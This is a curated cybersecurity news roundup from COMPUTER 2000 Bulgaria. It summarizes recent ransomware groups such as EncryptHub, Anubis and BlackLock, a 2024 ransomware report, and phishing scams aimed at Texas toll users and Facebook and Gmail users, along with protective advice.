Ransomware/Malware
EncryptHub Breaches Hundreds of Organizations to Deploy Infostealers, Ransomware
EncryptHub, also known as Larva-208, is a sophisticated threat actor that has been targeting organizations globally with spear-phishing and social engineering attacks since June 2024. By impersonating IT support, the group uses SMS and voice phishing, along with fake login pages for popular corporate VPN products, to steal credentials and multi-factor authentication tokens. Once inside, they deploy Remote Monitoring and Management (RMM) software to gain remote access, then use PowerShell scripts to install data-stealing malware such as Stealc and Rhadamanthys, as well as a custom ransomware encryptor. EncryptHub has compromised at least 618 organizations, deploying a range of malware to steal sensitive data, including cryptocurrency wallets, VPN credentials, and password manager data. The group is affiliated with RansomHub and BlackSuit ransomware and has demonstrated a high level of sophistication, tailoring its attacks to evade detection and achieve high-value breaches.
New Report Shows Global Ransomware Crisis Worsened in 2024, Urging Stronger Cybersecurity Measures
BlackFog’s “2024 State of Ransomware Report” reveals that ransomware attacks reached unprecedented levels in 2024, with a 25% increase in disclosed incidents and a 26% rise in undisclosed ones compared to the previous year. This surge was driven by new ransomware variants and groups, including the prominent LockBit and the newcomer RansomHub, which caused significant damage to sectors such as healthcare, government, and manufacturing. The report highlights the growing threat to critical infrastructure, with attackers increasingly using data exfiltration tactics and extortion methods alongside encryption. Despite efforts by governments and organizations to combat these threats, ransomware continues to evolve, with the emergence of AI-driven attacks and ransomware-as-a-service (RaaS) models complicating defenses.
The Rise of the New Nascent Anubis RaaS Operation
The newly emerged Anubis ransomware-as-a-service (RaaS) operation, identified late last year, is poised to become a significant threat with its expansive affiliate programs. These include options for traditional ransomware attacks, stolen data monetization, and revenue-sharing with brokers. Anubis has shown a preference for data extortion over encryption in its attacks, though it still maintains the ability to encrypt files. Anubis’s operators are suspected to be experienced individuals, possibly former affiliates of other ransomware groups, contributing to the group’s growing menace.
The Rising BlackLock Ransomware Problem
Despite emerging just last March, the BlackLock ransomware-as-a-service (RaaS) group rapidly became one of the most prolific, ranking as the seventh most active ransomware gang after a 1,425% surge in activity between October and December. BlackLock targets Windows, VMware ESXi, and Linux systems with double extortion tactics, using proprietary malware and a custom leak site to demand immediate ransom payments while hindering organizations’ ability to assess breaches. The group recruits affiliates and traffers through the Russian cybercrime forum RAMP, prioritizing speed over security for early-stage attackers, although a more cautious approach is taken for higher-level roles like programmers.
Phishing/Scams
Toll Scams Are Targeting Texas Drivers
The Texas Department of Transportation (TxDOT) is warning residents about an ongoing toll scam targeting drivers. Fraudulent text messages, known as “smishing,” are being sent, claiming recipients have overdue toll balances. TxDOT assures customers that it never sends such reminders via text and that legitimate communications will only come from the number 22498. Victims of these scams should contact TxTag customer service directly and report the issue to the FBI’s Internet Crime Complaint Center. The public is advised to remain cautious and verify any suspicious messages by logging into their TxTag accounts or contacting customer service.
Phishing Scam Targets Facebook Users
Meta has issued a warning about a phishing scam targeting Facebook users, where scammers send fake text messages falsely alleging violations of trademark rules. These messages aim to deceive recipients into revealing personal information. Users are advised to remain vigilant and avoid engaging with unsolicited communications that request sensitive data.
Alert Issued to All Gmail Users
Gmail users have been warned about a growing scam that uses artificial intelligence to create convincing voice and video messages designed to steal money and personal information. These sophisticated phishing attacks start with a call claiming that a Gmail account has been compromised, followed by a legitimate-looking email from Google asking for the user’s Gmail recovery code. If tricked, victims not only lose access to their Gmail account but also risk identity theft and the loss of sensitive data. Experts from Malwarebytes advise users to be cautious about unsolicited communications, avoid clicking on suspicious links, and verify any security alerts directly through trusted channels. The FBI has also issued warnings about the rise of such AI-driven scams.
Learn more about this topic here.
_______
If this information is helpful to you, read our blog for more interesting and useful content, tips, and guidelines on similar topics. Contact the team of COMPUTER 2000 Bulgaria now if you have a specific question. Our specialists will be assisting you with your query.
Content curated by the team of COMPUTER 2000 on the basis of news in reputable media and marketing materials provided by our partners, companies, and other vendors.
Follow us to learn more
CONTACT US
Let’s walk through the journey of digital transformation together.
